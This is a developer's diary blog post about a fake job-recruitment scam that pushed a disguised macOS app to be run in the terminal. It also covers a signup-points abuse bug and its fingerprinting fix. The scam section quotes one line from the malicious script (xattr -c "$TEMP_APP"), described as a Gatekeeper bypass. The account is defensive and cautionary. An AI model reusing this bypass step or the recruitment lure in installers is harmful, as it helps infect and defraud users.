Sanvi

5 min read

Independent Development Diary 18: This Week Was Absurd: Scammers Targeted Me and Freebie Hunters Drained Me

This week has been really weird. I am guarding against scammers and catching woolly individuals at the same time.

The thing is like this, someone sent me an email saying that they are a team of a certain project and need to find a front-end. I said that I am not a front-end, and then said that they also have back-end positions and are hiring people. Then I added the contact information and chatted for a while. I didn’t talk too much about technology. I briefly talked about my experience. At this time, I didn’t have too many doubts (after all, the other person might not be very technical), and then I made an appointment to have a voice chat the next day about some more detailed content of their project.

At this time, I just wondered if it was another scam plan. I have recently encountered some teams that talk to you about technical solutions through recruitment, such as how to do this and how to do that.

Then he invited a foreigner (perhaps to express that it was an international team?). The foreigner could speak Mandarin, but I couldn't understand it well, and then we also chatted in English. But the strange thing is that they didn’t talk about the details of the project. They just asked about the development prospects and opportunities of the industry and other inexplicable things, and then told me that their team would go back to discuss it.

Then I passed the interview and was invited to join the team. This guy sent me a link and said he wanted to introduce the team members. Then I received a link to a website called weconne, and I signed up without paying attention at first. Because I have the habit of using 1password, the password is also random (I was lucky enough to avoid leaking the email password).

Then I downloaded the software and found that after opening it, it asked you to drag it into the terminal and run it. I did it without thinking much at the time. Then I found something was wrong, there was no feedback after running, and I immediately disconnected and restarted. After restarting, stay disconnected from the Internet, and then check the domain name through other devices. As a result, there is a .com domain name marked as scam. Then the AITDK of the website looked at the data and found that this website was registered 3 days ago. Finally, I searched on Twitter and found that one or two guys had been tricked. Because I didn’t finish the whole race, I don’t know what will happen next.

Then I re-opened its software with text and found that it would download another program (because I disconnected and restarted, this step could not be completed), and then gave the script to GPT for analysis, and GPT gave the following answer

  • The most dangerous line

:xattr -c "$TEMP_APP" - Clear all extended attributes, that is, bypass Gatekeeper/notarization check, so that the system will no longer block "from unknown developers".

  • There is no sudo, so there is no direct access to admin rights; it runs with the current user rights, but may still do user-level persistence (LaunchAgents, Login Items, crontab) or networking.

Next, I talked to GPT about how to self-check, then checked the startup items and background processes, and confirmed that there was no problem before connecting to the Internet. Then I told the scammer that my computer could not be installed and asked them to use zoom. They disagreed and said that all team members were in that software. Then they asked me for remote assistance, ignored them, and then broke the defense and said I wasted their time.

I didn't expect that I could encounter such a cautious person, let alone other people. In addition, I don’t know where my ig was leaked, and someone kept trying to log in. I changed my password, turned on email verification and two-step verification, and cleared all login devices, but there is still a steady stream of verification code emails. I don’t know what the logic of meta is.

createio

Before I could get over it, I found out that the products I made were awarded points. Because the number of users is not very large now, I basically just look at the accessed data.

Occasionally I looked at the user usage of the database, and then I discovered an interesting thing. There was a user who appeared very frequently, but I thought about it and there were no paying users this week, so I checked it and found that he was a free user, but he obviously exceeded the free user usage period. My first reaction was that there was a bug. After spending dozens of dollars, I found the problem. Because previous projects only allowed Google login, the bonus points for new users were written in the login area.

Then this time, email login is supported, so the logic becomes that the gift points will be checked when logging in, but we did not store the user's gift behavior mark in the database, and simply judged 0 and gave it away. There have been no problems before. When I heard about this Chinese guy, I don’t know how he discovered this bug. Anyway, he just kept logging in again to gain points and then create videos.

I originally thought that the matter would be over after solving this problem, but I discovered a new problem. The mailboxes of new users were all strange. They were all domain name mailboxes that did not look normal and were not commonly used mailbox domain names. But I later found out that these users were the same, because they used the same prompt words, and then they kept searching.

Then we chatted with GPT for a long time and found a third-party service that can identify the user's fingerprint information, such as network, UA, etc., and through some intelligent judgments, there will be a unique visitor ID. Then we use this visitor ID to identify whether the newly registered user is the same and then decide whether to give points. Then I caught this guy’s IP coming from Shanghai, and I don’t know who he is.

That’s it for this week